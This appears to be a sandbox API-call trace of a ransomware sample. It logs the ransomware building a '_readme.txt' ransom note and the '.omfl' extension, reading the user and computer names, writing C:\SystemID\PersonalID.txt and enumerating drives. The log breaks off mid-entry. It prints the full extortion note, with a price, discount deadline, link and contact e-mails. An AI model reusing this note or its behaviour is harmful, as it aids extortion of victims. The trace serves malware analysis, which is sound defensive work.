[0113.268] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7508238 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75084a0 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x816) returned 0x74f21d8 [0113.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d878, cbMultiByte=-1, lpWideCharStr=0x74f21d8, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x74f9cc8 [0113.269] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x28) returned 0x7506068 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7508708 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7508970 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7508bd8 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7508e40 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75090a8 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7509310 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7509578 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x75097e0 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7509a48 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7509cb0 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0x4a27510 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x130) returned 0x7517ea8 [0113.269] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a27510 | out: hHeap=0x4970000) returned 1 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1d0) returned 0x7519630 [0113.269] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7517ea8 | out: hHeap=0x4970000) returned 1 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2b7) returned 0x7519c88 [0113.269] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7519630 | out: hHeap=0x4970000) returned 1 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x412) returned 0x74e4488 [0113.269] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7519c88 | out: hHeap=0x4970000) returned 1 [0113.269] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x61a) returned 0x74f21d8 [0113.270] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4488 | out: hHeap=0x4970000) returned 1 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x440) returned 0x74e4488 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1068) returned 0x74eff28 [0113.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x74e4488, cbMultiByte=-1, lpWideCharStr=0x74eff28, cchWideChar=2100 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned 1077 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1070) returned 0x751b0c8 [0113.270] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74eff28 | out: hHeap=0x4970000) returned 1 [0113.270] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4488 | out: hHeap=0x4970000) returned 1 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x28) returned 0x7506098 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x7509f18 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x750a180 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751c158 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751c3c0 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751c628 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751c890 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751caf8 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751cd60 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751cfc8 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751d230 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80a) returned 0x74fa4f0 [0113.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d878, cbMultiByte=-1, lpWideCharStr=0x74fa4f0, cchWideChar=1029 | out: lpWideCharStr=".omfl") returned 6 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x74eff28 [0113.270] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fa4f0 | out: hHeap=0x4970000) returned 1 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0x750af60 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3588 [0113.270] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49ba700 | out: hHeap=0x4970000) returned 1 [0113.270] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x750bdd0 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x48) returned 0x74ff308 [0113.271] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3588 | out: hHeap=0x4970000) returned 1 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0x4a5f960 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0x4a5f9c8 [0113.271] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74ff308 | out: hHeap=0x4970000) returned 1 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d59b8 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0x748ef18 [0113.271] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5f9c8 | out: hHeap=0x4970000) returned 1 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x750be28 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x750be80 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xd8) returned 0x74826a8 [0113.271] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x748ef18 | out: hHeap=0x4970000) returned 1 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5a48 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0x750b000 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x750bed8 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x138) returned 0x7517ea8 [0113.271] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74826a8 | out: hHeap=0x4970000) returned 1 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0x4a5f9c8 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5a90 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x750bf30 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x750bf88 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c8) returned 0x750cdd0 [0113.271] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7517ea8 | out: hHeap=0x4970000) returned 1 [0113.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5ad8 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7517ff0 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750af60 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750bdd0 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5f960 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d59b8 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750be28 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750be80 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5a48 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b000 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750bed8 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5f9c8 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5a90 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750bf30 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750bf88 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5ad8 | out: hHeap=0x4970000) returned 1 [0113.272] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cdd0 | out: hHeap=0x4970000) returned 1 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x28) returned 0x75060c8 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751d498 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751d700 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751d968 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751dbd0 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751de38 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751e0a0 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751e308 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751e570 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751e7d8 [0113.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x25c) returned 0x751ea40 [0113.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0x4a27510 [0113.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x130) returned 0x74b6528 [0113.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a27510 | out: hHeap=0x4970000) returned 1 [0113.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1d0) returned 0x7519630 [0113.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74b6528 | out: hHeap=0x4970000) returned 1 [0113.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2b7) returned 0x7519c88 [0113.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7519630 | out: hHeap=0x4970000) returned 1 [0113.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x412) returned 0x74e4488 [0113.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7519c88 | out: hHeap=0x4970000) returned 1 [0113.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x61a) returned 0x74fa4f0 [0113.273] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4488 | out: hHeap=0x4970000) returned 1 [0113.273] GetUserNameW (in: lpBuffer=0x18da78, pcbBuffer=0x18d8ec | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d8ec) returned 1 [0113.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x590) returned 0x74e4488 [0113.274] GetLastError () returned 0x0 [0113.278] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d5e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.278] GetLastError () returned 0x3 [0113.278] GetLastError () returned 0x3 [0113.278] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0113.281] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18d5e0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5dc [0113.281] GetFileType (hFile=0x5dc) returned 0x1 [0113.281] GetLastError () returned 0x0 [0113.289] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.289] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0113.289] RegisterClassExW (param_1=0x18d858) returned 0xc168 [0113.289] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x9011a [0113.290] NtdllDefWindowProc_W () returned 0x0 [0113.290] NtdllDefWindowProc_W () returned 0x1 [0113.293] NtdllDefWindowProc_W () returned 0x0 [0113.553] NtdllDefWindowProc_W () returned 0x0 [0113.554] ShowWindow (hWnd=0x9011a, nCmdShow=0) returned 0 [0113.554] UpdateWindow (hWnd=0x9011a) returned 1 [0113.554] GetLogicalDrives () returned 0x4 [0113.554] SetErrorMode (uMode=0x1) returned 0x0 [0113.554] PathFileExistsA (pszPath="C:\\") returned 1 [0113.554] SetErrorMode (uMode=0x0) returned 0x1 [0113.554] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x806) returned 0x7546268 [0113.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d810, cbMultiByte=-1, lpWideCharStr=0x7546268, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x75472d0 [0113.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7546268 | out: hHeap=0x4970000) returned 1 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x49ba700 [0113.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75472d0 | out: hHeap=0x4970000) returned 1 [0113.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49ba700 | out: hHeap=0x4970000) returned 1 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x49ba700 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0x74e8538 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8ec) returned 0x7520140 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x7546268 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x754f890 [0113.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1070) returned 0x755e768 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0x4a5f960 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x75472d0 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x660) returned 0x74f1740 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7550118 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x75509a0 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7551228 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7551ab0 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7552338 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x7520a38 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7552bc0 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7553448 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x755f7e0 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7560028 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7560890 [0113.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7553cd0 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7554558 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x75610f8 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x7561940 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7554de0 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7555668 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7555ef0 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7556778 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7557000 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7557888 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7558110 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7558998 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7559220 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7559aa8 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7562188 [0113.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x75629f0 [0113.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x755a330 [0113.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x755abb8 [0113.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x755b440 [0113.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x7563258 [0113.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x7563aa0 [0113.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x755bcc8 [0113.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x755c550 [0113.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x755cdd8 [0113.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x755d660 [0113.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7564300 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7564b88 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7565410 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7565c98 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7566520 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x75742e8 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7574b50 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7566da8 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7567630 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7567eb8 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x75753b8 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x7568740 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7568fc8 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7569850 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x756a0d8 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x756a960 [0113.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x756b1e8 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x756ba70 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x756c2f8 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x756cb80 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x756d408 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7575c00 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7576468 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x756dc90 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x756e518 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x756eda0 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0x756f628 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x756feb0 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7570738 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0x7570fc0 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7571848 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x75720d0 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc0) returned 0x74e6708 [0113.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0x7572958 [0113.562] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x754a478 [0113.562] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x7576cd0 [0113.562] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x75774e8 [0113.562] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x7577d00 [0113.562] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x7578518 [0113.562] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x7578d30 [0113.563] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0x75731e0 [0113.563] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0x4a5fa30 [0113.563] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd0060 [0113.564] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd08e8 [0113.564] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd1170 [0113.564] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd19f8 [0113.564] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x110) returned 0x74b6528 [0113.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x7520148, dwCreationFlags=0x0, lpThreadId=0x74e8540 | out: lpThreadId=0x74e8540*=0x618) returned 0x3b0 [0113.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0xa8c) returned 0x3ac [0113.566] GetMessageW (in: lpMsg=0x18da08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18da08) returned 0 [0131.672] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0xdd29950 [0131.672] GetComputerNameW (in: lpBuffer=0xdd29950, nSize=0x18cd84 | out: lpBuffer="XDUWTFONO", nSize=0x18cd84) returned 1 [0131.672] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.672] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.672] IsWindow (hWnd=0x9011a) returned 1 [0131.672] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.221] IsWindow 